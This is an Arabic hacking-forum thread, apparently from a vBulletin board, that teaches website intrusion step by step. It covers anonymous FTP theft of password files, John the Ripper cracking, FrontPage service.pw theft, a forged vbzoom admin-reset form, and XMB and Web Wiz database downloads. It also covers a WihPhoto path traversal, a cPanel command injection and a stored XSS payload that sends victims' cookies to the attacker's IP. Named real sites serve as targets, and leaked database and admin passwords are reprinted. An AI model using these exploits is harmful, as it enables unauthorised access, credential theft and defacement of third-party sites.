![]() |
بسم الله الرحمن الرحيم
><>< وما اوتيم من العلم الا قليلا ><>< صدق الله العظيم اخوانى واحبائى فى الله وفى المنتدى الكريم اسعد الله وقتكوم باختراقات موفقه اليوم راح نتكلم عن تعليم اختراق المواقع للمبتدئين والمحترفين فى الاختراق نبداء بشرح الثغره وكيف معناها موافقين انشاء الله كاتب الموضوع الاصلى الوطواط الاحمر Mr>>ReD BaT ><>< ><><>< @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ بسم الله الرحمن الرحيم وقل ربى زدنى علما صدق الله العظيم !! الكاتب !! الوطواط الاحمر بسم الله """" اولا يا شباب يعنى ايه ثغره وكيف تتطبقها وطيف تعرف ان الموقع يدعم بثغره اسئله تدور فى ذهننا فلكى تعرف فتابع هاد الشرح مع التطيبق !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!! !!!!!!!!!!!!!!!!!!!!!!!!!! " الثغرات " * لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع User name-Password وهما يكونان محفوظين في ملف يسمي PASSWDغالبا بعض المواقع تضع هذا الملف في الإف تي بي ما هو إف تي بي؟ FTP=File Transfer Protocol بروتوكول نقل الملفات تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت start==>run إبدأ ثم تشغيل واكتب telnet سيفتح التلنت اضغط علىRemote System ==> connect ثم اكتب الموقع في Host Name مثلا kahane.org أو الآيبي الخاص به وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي ثم اضغط connect وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code user anonymous ثم انتر بعدها يطلب السيرفر كلمة السر اكتب pass zzzoozz@yahoo.com اكتب أي بريد ككلمة سر وطبعا سيكون وهميا ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح.. بعدها سنحصل على ملف الباسوورد قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل cute ftp - ws_ftp مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان ftp.kahane.org لتحصل على الملف في التلنت اكتب retr /etc/passwd /etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع Sunos 5.0 etc/shadow او etc/passwd Linux etc/shadow او etc/passwd BSD4.3 –RENO etc/master.passwd AIX etc/security/passwd NT ويندوز scripts/passwd وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها الاختراق من الإف تي بي أصبحت طريقة قديمة لذا لن تجد موقعا حديثايضع ملف الباسوورد في إف تي بي ذكرنها فقط كمقدمة..إذا أردت تجريبها جربها على هذا الموقع ftp.pangeia.com.br ولزيادة معلوماتك عن الاختراق بالف تي بي قم بتحميل الملف الموجود بنهاية الصفحة وبعدها؟؟المشوار مازال طويلا...كلمة السر ستكون مشفرة وسنشرح كيقية كسرها في النهاية.... -------------------------------------------------------------------------------- Exploit = اسثمار = ثغرة الجزء المهم: الثغرات هي أخطاء برمجية في نظام التشغيل ويمكنك استغلالها للحصول على ملف الباسوورد وقاعدة البيانات وووو..إلخ أولا يجب أن تجمع كل المعلومات الممكنة حول الموقع : 1- المنافذ المفتوحة مثل الإف تي بي والتلنت مثلا وهذ عن طريق برامج مثل super scan ابحث عنه في الانترنت. 2- معرفة نظام تشغيل الموقع ويندوز أم لينوكس وغيرها والفائدة من ذلك أن كل نظام له ثغراته الخاصة به واسم المجلد الذي به ملف الباسوورد يختلف من نظام تشغيل لآخر. لمعرفة نظام التشغيل إذهب إلى الموقع www.netcraft.net واكتب الموقع ثم إنتر..!!.! وستعرف بعض المعلومات عن الموقع كلآيبي ونظام التشغيل...إلخ 3- معرفة كل مايقدمه الموقع من خدمات كالبريد وغير ذلك 4- معرفة البرامج المثبتة على الموقع مثل المنتديات وبرامج السي جي آي أنواع الثغرات أبسط الأنواع هي التي يمكن الوصول إليها عن طريق المتصفح مثل www.thesite.com/....../ والأنواع الباقية أو الاستثمارات : ثغرات مكتوبة بلغة بيرل *.pl ويمكن استخدامها في لينوكس أو في ويندوز إذا كان لديك برنامج Active Perl ثغرات بلغة سي *.c يمكن استخدامها في لينوكس فقط ثغرات بلغة شل *.shويمكن استثمارها في لينوكس فقط ويمكنك إيجاد الكثير من الأنواع السابقة الخاصة بلينوكس فيمواقع الثغرات وإليك بعضها www.securiteam.com www.securityfocus.com www.ukrt.f2s.com www.ussrback.com www.packetstorm.securify.com www.secureroot.com www.rootshell.com أما ثغرات المتصفح يمكنك الكشف عنها بالبرامج الموجودة في قسم البرامج. ويمكنك من خلال البرامج الموجودة على السيرفر كالمنتديات أو برمجيات بيرل وسيجي آي أن تبحث عن ثغرات لها في مواقع الثغرات أو المواقع السابقة.وبرمجيات بيرل وسي جي آي قد تكون كتاب زوار أو محرك بحث أو حتى عداد زوار حسنا لنفرض أنك حصلت على ملف الباسوورد..المشكلة أن كلمةالسر تكون بداخله مضللة shadowed أو مشفرة encryption. مثال لملف باسوورد root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp ولأن ملف الباسوورد يحتوي على كلمات سر الأشخاص المرخص لهم بدخول الموقع قد لا بزيد عن عشرة أسطر وقد يصل آلاف الأسطر... كلمات السر السابقة مضللة وهي علامة xوقد تختلف.. أما المشفرة والتي سنحصل عليها تكون هكذا: مضللة root:x:0:1:Super-User:/:/sbin/sh مشفرة root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh root = أو الجذر اسم المستخدم x = كلمةالسر ولكنها مضللة وباقي السطر غير مهم في الأغلب ستكون كلمة السر مضللة shadowed لذا عليك أن تبحث عن ملف آخر يحوي كلمة السر مشفرة يسمى ملف الشادو shadow file ويوجد في أماكن معينة تختلف باختلاف نظام التشغيل token = الرمز الذي يعبر عن الباسوورد Linux : /etc/shadow token = * SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو * FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x IRIX : /etc/shadow token = x AIX : /etc/security/passwd token = ! ConvexOS : /etc/shadow or /etc/shadpw token = * مثال لملف شادو root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445:::::: نجد أن كلمة السر هي EpGw4GekZ1B9U كيف تفك التشفير؟ عن طريق برامج مخصصة لذلك أفضلها تجده في صفحة برامج الثغرات John the ripper وهو يقوم بتجريب كل المحاولات الممكنة حتى يحصل على الباسوورد . ولكن يجب أن تضع له الباسووردات في ملف مفكرة مثلا وعليك وضع الكلمة المشفرة بدلا من الx وعليك ترتيبها بحيث يكون كل حساب في سطر طريقة تشغيله: إذهب إلى الدوس واكتب john passwd حيث passwd هو الملف الذي به الباسوورد المشفرة وضعتها سيظهر : by Sola 97,John the Ripper Version 1.3 Copyright © 1996 Loaded 1 password **v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE وإذا أردت معرفة الباسوورد التي يخمنها الآن اضغط انتر والباسوورد الصحيحة ستحفظ في ملف في نفس المجلد الذي به البرنامج اسمه john.pot وإذا أردت القيام بعملية كسر أخرى عليك إلغاء الملف أو تغيير اسمه وفى النهايه ارجو الاستفاده من هاد الموضوع جميع الحقوق محفوظه لدى الوطواط الاحمر @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ الدرس الثانى ><><>< ][®][^][®][][®][^][®][ وهوا ثغرات المواقع ونبداء من اول ثغراته ونبدء باولال الثغرات ~!~ ثغرة سباق المواقع ~!~ ===================== أولا إذهب إلى أي محرك بحث .. مثلا GOOGLE وإكتبtop_list/list.php3 رح تلقى الكثير من المواقع ورح يكون اخر الموقع كدا top_list/list.php3 مثلا هذا الموقع http://www.coreground.de/top_list/list.php3 وكذا يكون دخلنا صفحة سباق المواقع قم بمسح هذا "list.php3" وبدله بـ admin/updates_admin.php3 سيصبح عنوان الموقع هكذا http://www.coreground.de/top_list/a...ates_admin.php3 إدخل على هذا العنوان ومن ثم سيظهر لك مربع قم بالذهاب الى الفرونت بيج واكتب الي تبيه مثلا HACKED BY ALNOR3S وثم اذهب من الفرونت بيج الى خانة HTML وانسخ مابداخله بالكامل وضعه في المربع الي في هذا العنوان http://www.coreground.de/top_list/a...ates_admin.php3 عد كذا اضغط رفع ليرفع الكلام الي الصفحة ادخل الى الموقع http://www.coreground.de/top_list/list.php3 وشوف توقيعك الي سويته في الفرونت بيج ================== عيب هذه الثغرة ان اي واحد يعرف الثغرة يقدر يخترق بعدك ... وهذا الموقع تم اختراقه من قبلى http://forums.thebreeze.org/ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ثغرة الفرنت بيج السلام عليكم شباب , الفرونت بيج يعتبر من اهم البرامج في انشاء المواقع , ولكن يوجد به ثغرة قويه تمكنك من اختراق موقع الضحيه وامتلاكه وسوف اقوم بعرض هذهي الثغره بشكل مبسط نبدا : اول شي لازم تعرف اذا الموقع يدعم الفرونت بيج وله لا روح على هذا الموقع http://www.netcraft.com واكتب اسم الموقع وستجد معلومات عن الموقع , ومن بينها اذا كان يدعم الفرونت بيج وله لا . شرح الثغرة : الفرونت بيج عند تنصيبه يقوم باقامة فولدرات وهي : /_private /_vti_bin /_vti_cnf /_vti_log /_vti_pvt (اخطرهم ) /_vti_txt ولتطبيق الثغره , اكتب اسم الموقع في المتصفح وبعدين اكتب وراه الثغره مثال : /http://xxxx.com/_vti_pvt او يمكنك استخدام برامج البحث عن ثغرات المواقع , و الي من اهمها برنامج عمران omran scan اوكيه بعد هذي الخطوه بتدخل على الفولدر الي كتبناه (_vit_pvt_/) وداخله بتحصل ملف مهم جدا باسم service.pw هذا الملف يحتوي على باسورد صاحب الموقع ولكنه مشفر بمقياس des ولفك الشفره بنستخدم برنامج john de ripe حمل الملف السابق service.pw على جهازك وافتح الملف بواسطة برنامج john de ripe , الي يعتمد على تحويل الملف من encypretd الى plan text يعنى تحويل الكلمه المشفره الى كلمه عاديه . وبعد ما تفك الشفره خلاص صار الباسورد في ايدك وتستطيع التحكم بالموقع عن طريق الفرونت بيج او رفعه ببرامج ال ftp . اتمنى انكم استفدتو , وانكم ما تستخدمون الطريقة في اذيت اخوانكم المسلمين . وهذا برنامج john de riper http://www.h4palestine.com/download/john-1.6.tar.gz @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ثغرة منتديات vbzoom إفتح المفكرة وضع هذا الكود <form name="f1" action="http://www.domin.com/vbzoom/register.php" method="POST"> <input type="hidden" name="ChangeProfile" value="1"> User Name: <input type="text" name="UserName"> Password: <input type="text" name="Password"> Email: <input type="text" name="Email"> <input type="hidden" name="HomePage" value="lamerZ"> <input type="hidden" name="VBZooMForumCookiesUserName" value="false"> <input type="hidden" name="VBZooMForumCookiesUserName" value="false"> <input type="submit" value="reset password"> </form *غيرdomin.com إلى عنوان الموقع إحفظ الكود بإمتداد html إفتح الملف بعد حفظه تجد ثلاث فراغات 1_ضع فيه إسم مستخدم (*مثال:الملثم*) 2_ضع الباسوورد 3_ضع إيميلك --------------------------------------------------------- روح لهذا العنوان http://www.domin.com/vbzoom/admin/index.php مع تغيير domin.com إلى عنوان الموقع ---------------------------------------------------------- المنتدى بين يديك -------------------------------------------------------------- ثغره اخرى في المنتديات ثغرة جديدة في منتديات من نوع XMB الشرح والتطبيق 1- عليك بالذهاب الى موقع جوجل http://www.google.com 2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final 3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده. 4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى index_log.log يعني راح يكون زي كده http://www.******.com/massegboard/index_log.log 5- راح ينزل عندك ملف والملف عباره عن ملف زي الكوكيز كبير وفيه اسماء المستخدمين والباسورد وأشياء ثانيه ماتهمنا. 6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه. 7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك زي كده مثلا:: xmbuser=admin واباس راح تلقاه قدامه زي كده xmbpw=1faeb6747a31c854800ddf3c62b1717a 8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج ftp://www.cafecounterintelligence.com/cci/chigger.exe 9- اعدادت البرنامج كتالي في الصورة: رقم (1) قم بوضع علامة صح. رقم (2) قم بوضع اسم العضو سواء مدير او غيره رقم (3) قم بوضع الباس المشفر حق العضو او المدير او غيره رقم (4) قم بوضع علامة صح. رقم (5) قم بوضع البروكسي الي تريده اوالبروكسي حق مزوده الخدمه حقك رقم (6) قم بوضع المنفذ حق البروكسي 10- بقي شيء واحد بعد اتمام الأعدادات حقت البرنامج بقي ان تذهب الى المتصفح انترنت اكسبلورر > اضغط بالزر اليمين> الأتصالاات> اعدادات> قم بوضع البروكسي هذا 127.0.0.1> والمنفذ 8080 11- بعد ذلك اذهب للمنتدى المستهدف وتجول فيه وكأنك المديرتبع المنتدى @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |
شكرا يا باشا
انا شايف الموضوع دا بالحرف ةمن حوالي شهرين بجد مشكووووووووووووور |
ثغره منتديات Web Wiz Guide
مثال:http://host.basharnet.com/forum الشرح: ثغرة تصيب منتديات Web Wiz Guide أولا إذهب إلى google اكتب Web Wiz forum وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى واكتب بعد forum admin/wwforum.mdb حمل الملف وادخل عليه عن طريق microsoft office access بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin سجل اسمك والباسوورد الآن أنت في لوحة التحكم @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ يتــــــــــــــــــــــــــــــــبع ][®][^][®][][®][^][®][ ثغرة عبارة عن ثغرة php هذه الثغرة عبارة عن ثغرة php هذه الثغرة تعتمد على نظام الاختراق العشوائي بمعني أننا سنبحث عن هذه الثغرة في المواقع التي تحتوي على هذه الثغرة من خلال محرك البحث جوجل نضع في خانة البحث "powered by wihphoto" طبعا سوف يجد لنا مواقع كثيرة نختار الموقع الأول على سبيل المثال وهو http://spikies-chinchilla-news.de/p...lerie/admin.php نقوم بحذف من الموقع admin.php ونضيف إليه الجمله التالية sendphoto.php?album=..&pic=config.inc.php فبالتالي يصبح العنوان لدينا كالتالي http://spikies-chinchilla-news.de/p...=config.inc.php ادخل تحت جمله Sende config.inc.php an اميلك بالكامل واضغط على زر الارسال سوف تصلك رسالة فورية بعد ثواني سوف تصلك على اميلك رسالة بها ملف ملف مرفق اسمه ._albums_.._config.inc.php عندما تقوم بفتح هذا الملف سوف تجد التالي FREE FOR NON-COMMERCIAL USE <-- */ / ************************* ************************* ************************* **/ // WihPhoto Versionsnummer // ======================= $version = "0.86-dev"; $language = "german.php"; // Sprachfiles z.B. "german.php" fuer Deutsch // siehe $language Verzeichnis // http - Adresse: // =============== // Bei 0.86-dev noch ohne Bedeutung! $wihphoto_http = "http://"; // Verzeichnisse: // ============== $wihphoto_dir = "/var/www/web1/html/photogallerie"; // Pfad absolut $wihphotodir = "/var/www/web1/html/photogallerie"; // Pfad absolut $pix_base = "albums"; // ... die Orginalphotos Pfad relativ $dyn_base = "auto"; // ... die dynamisch generierten Photos Pfad relativ $lang_dir = "languages"; // ... language packs Pfad relativ // WihPhoto - Darstellungsoptionen // ========================= ====== $items_per_page = 20; // maximale Anzahl Photos/Seite $display_cols = 4; // Spalten pro Seite $default_size = 512; // Standardbreite der Bilder bei Betrachtung des Albums $thumb_size = 120; // Breite der generierten Thumpnails // Breite der Bilder welche generiert werden // ========================= ================ $viewsizes = array(400,512,640,800,"Original"); // Wenn man einen Link zur Hauptseite der Homepage machen mِchte kann er mit $sitehome // zur Navigationsleiste hinzugefügt werden // ========================= ========================= ========================= ======== $sitehome = "http://spikies-chinchilla-news.de/basefr.htm"; // Startseite von WihPhoto: 1 = Umfangreich, mit Bild, Beschreibung, .... // 0 = einfache Auflistung der Alben // ========================= ========================= ==================== $startsite = 1; // MySQL-DB Einstellungen // ====================== $database = "usr_web1_5"; //MySQL Datenbankname $sqlhost = "localhost"; //MySQL Hostname $sqluser = "web1"; //MySQL Username $sqlpass = "q+q27rym"; //MySQL Passwort // Passwort zum hinzufügen von Bildinformationstext // ========================= ======================= $adminpass= "galleriemaster"; // Wird PHP im SAFE MODE betrieben? // ========================= ======= $safemode = false; // true ... SAFE MODE, false ... kein SAFE MODE // E-Mail Einstellungen für die "SendPhoto" Funktion // ========================= ======================== $subject = "Spikies-Photogallerie"; // E-Mail Subject $replyto = "Spike@spikies-chinchilla-news.de"; // Sende E-Mail Adresse // ----------------------------------------------------------------------- // ab hier keine ؤnderungen notwendig! // ----------------------------------------------------------------------- // MySQL - Tabellennamen // ===================== $wp_start = "wp_start"; // Startseite (Albennamen, Albuminfos, Reihung, ...) $wp_photoinfo = "wp_photoinfo"; // Beschreibungen zu den einzelnen Photos // Zur Grafikenerzeugung: // "gd" ... GD (http://www.boutell.com/gd) // "im" ... ImageMagick (http://www.imagemagick.org/) // ========================= = $ImageTool = "gd"; // Falls als $ImageTool "im" also ImageMagick gewنhlt wurde // muss der Pfad zur "convert" Funktion angegeben werden! $convert = "/usr/bin/convert"; // EXIF Support // (funkt noch nicht!) // =================== $show_exif = 0; // Rand bei Thumpnails // =================== $thumb_border = 1; // Sprachfiles laden: require ("$wihphoto_dir/$lang_dir/$language"); ?> ************************* ************************* ************************* ****** ولكن اعتقد أن أهم شئ من هذا الملف كله هو هذا المقطع // MySQL-DB Einstellungen // ====================== $database = "usr_web1_5"; //MySQL Datenbankname $sqlhost = "localhost"; //MySQL Hostname $sqluser = "web1"; //MySQL Username $sqlpass = "q+q27rym"; //MySQL Passwort // Passwort zum hinzufügen von Bildinformationstext // ========================= ======================= $adminpass= "galleriemaster"; حيث يذكر لن االباسووردات الخاصة بالموقع وقاعدة البيانات :8: :8: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ثغره لوحه التحكم المواقع Cpanel للكاتب SmaRt المعروف أن Cpanel هي لوحة تحكم تضاف للمواقع لإمكانية التحكم في جميع ما يحتويه الموقع يوجد منفذ لعمل دفع أو ما يسمونه أمر ريموت في البرنامج Cpanel اكتشفت ثغرة في هذا المنفذ الذي يظهر المطلوب لتصحيح النقص الخارجي أو الذي يكون مزود ببيانات للسكربت الذي يقوم باسترجاع الاسم والرقم السري الهكرز طبعا استغلوا هذه الثغرة من المشكلة بدهاء وبراعة حيث يطلبون الURI كأنهم يستخدمون السكربت عادي ليجهزوا خاصية الشيل والأوامر التحكمية لكل قيمة ومتغير (خلصنا مناقشة ) نأتي الآن للنسخ المصابة وهي : cPanel cPanel 5.0 cPanel cPanel 5.3 cPanel cPanel 6.0 cPanel cPanel 6.2 cPanel cPanel 6.4 cPanel cPanel 6.4.1 cPanel cPanel 6.4.2 .STABLE_48 cPanel cPanel 6.4.2 cPanel cPanel 7.0 cPanel cPanel 8.0 cPanel cPanel 9.0 cPanel cPanel 9.1 والثغرة تطبق على النحو التاالي : ls"|" target="_blank">http://www.example.com:2082/resetpass/?use...t;>ls"| حيث ان example.com هو عنوان الموقع اعذروني لاني ما جربت الثغرة الى الان لاني اول ما قرأتها وضعتها لكم طريقة اكتشاف الثغرة : وصلت رسالة الى موقع www.securityfocus.com من Arab ViruZ أحد أعضاء Saudi Devilz Team والرسالة على النحو التالي (ترجمتها) :- العنوان : Cpanel 8 تحتوي على مشكلة ؟؟ البريد : Arab VieruZ <arabviersus hotmail com> مرحبا جميعا عندما جربت ارجع الباسورد تبعي جربت هذه الوصلة : ls"|" target="_blank">http://cpanel.com:2082/resetpass/?user=|">ls"| لكنني حصلت على هذا : */ sh: line 1: /var/cpanel/users/: is a directory "sh: line 1: >ls: command not found" Password Reset Resetting password for |">ls"|: A confirmation email has been sent to the email address on file. */ انظر الى هذه sh: line 1: >ls: command not found هل هذه مشكلة @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ الموضوع : اختراق الـ vBulletin المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) . المستوى : متوسط ملاحظة : هذه الطريقة لست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات . --------------------------------------------------- --------------------------------------------------- تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML .. قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود : <script>document.write('[img]http://my_ip_address/'+****************+'[/img]';</script> مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك . وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) . وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك .. مثال لو كان السيرفر ا****ي .. فتاح المجلد Apche واختر logs واختر Acces Log . ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ ابحث عن الكود الخاص بالباسورد .. مثال : GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1b ddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[54 20]=1012444064;%20bblastvi sit=1011983161 فكر قليلا الان .. اين الباسورد ؟؟ الباسورد موجود لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟ قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash] ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) " في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) .. لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن .. اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. ! --------------------------------------------------- الحل --------------------------------------------------- للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... ) (واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت ) كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وضعت <img> او <Demon> او اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ . Be Secret .. Dont' be Lamer . . منقول الكاتب الاصلي الوطواط الاحمر أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين منقووووول للفائدة تحياتي للجميع |
جميع الأوقات بتوقيت GMT +2. الساعة الآن 12:57 PM. |
Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.